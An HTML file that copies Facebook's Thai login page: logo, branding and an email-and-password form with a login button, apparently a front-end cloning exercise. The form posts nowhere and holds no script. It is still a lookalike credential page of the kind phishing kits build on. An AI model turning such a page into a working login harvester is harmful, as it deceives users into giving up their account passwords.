<!DOCTYPE html>
<html lang="en">

<head>
    <meta charset="UTF-8">
    <meta name="viewport" content="width=device-width, initial-scale=1.0">
    <link rel="stylesheet" href="https://stackpath.bootstrapcdn.com/bootstrap/4.5.2/css/bootstrap.min.css"
        integrity="sha384-JcKb8q3iqJ61gNV9KGb8thSsNjpSL0n8PARn9HuZOnIxN0hoP+VmmDGMN5t9UJ0Z" crossorigin="anonymous">
    <link rel="stylesheet" href="style.css">
    <title>Facebook</title>
</head>

<body class="fbIndex" dir="ltr">
    <div class="_li" id="u_0_3">
        <div class="fb_content clearfix " id="content" role="main">
            <div>
                <div class="_8esj _95k9 _8esf _8opv _8f3m _8ilg _8icx _8op_ _95ka container">
                    <div class="_8esk  row">
                        <div class="_8esl col-lg-6">
                            <div class="_8ice row">
                                <img class="fb_logo" src="https://static.xx.fbcdn.net/rsrc.php/y8/r/dF5SId3UHWd.svg"
                                    alt="Facebook">
                            </div>
                            <h2 class="_8eso">Facebook ช่วยคุณเชื่อมต่อและแชร์กับผู้คนมากมายรอบตัวคุณ</h2>
                        </div>
                        <div class="_8esn">
                            <div class="_8iep _8icy _9ahz _9ah-">
                                <div class="_6luv _52jv">
                                    <form class="_featuredLogin__formContainer" data-testid="royal_login_form"
                                            name="jazoest" value="2723" autocomplete="off"><input type="hidden"
                                            name="lsd" value="AVoYNjmO" autocomplete="off">
                                        <div>
                                            <div class="_6lux"><input type="text" class="inputtext _55r1 _6luy"
                                                    name="email" id="email" data-testid="royal_email"
                                                    placeholder="อีเมลหรือหมายเลขโทรศัพท์มือถือ" autofocus="1"
                                                    aria-label="อีเมลหรือหมายเลขโทรศัพท์มือถือ"></div>
                                            <div class="_6lux"><input type="password" class="inputtext _55r1 _6luy"
                                                    name="pass" id="pass" data-testid="royal_pass"
                                                    placeholder="รหัสผ่าน" aria-label="รหัสผ่าน"></div>
                                        </div><input type="hidden" autocomplete="off" name="login_source"
                                            value="comet_headerless_login">
                                        <div class="_6ltg"><button value="1"
                                                class="_42ft _4jy0 _6lth _4jy6 _4jy1 selected _51sy" name="login"
                                                data-testid="royal_login_button" type="submit"
                                                id="u_0_b">เข้าสู่ระบบ</button></div>
                                        <div class="_6ltj"><a
                                                href="https://th-th.facebook.com/recover/initiate/?ars=facebook_login">ลืมรหัสผ่านใช่หรือไม่</a>
                                        </div>
                                        <div class="_8icz"></div>
                                        <div class="_6ltg"><a role="button"
                                                class="_42ft _4jy0 _6lti _4jy6 _4jy2 selected _51sy" href="#"
                                                ajaxify="/reg/spotlight/" id="u_0_2"
                                                data-testid="open-registration-form-button"
                                                rel="async">สร้างบัญชีใหม่</a></div>
                                    </form>
                                </div>
                                <div id="reg_pages_msg" class="_58mk"><a
                                        href="/pages/create/?ref_type=registration_form" class="_8esh">สร้างเพจ</a>
                                    สำหรับบุคคลมีชื่อเสียง วงดนตรี หรือธุรกิจ</div>
                            </div>
                        </div>
                    </div>
                </div>
            </div>
        </div>
    </div>
</body>

</html>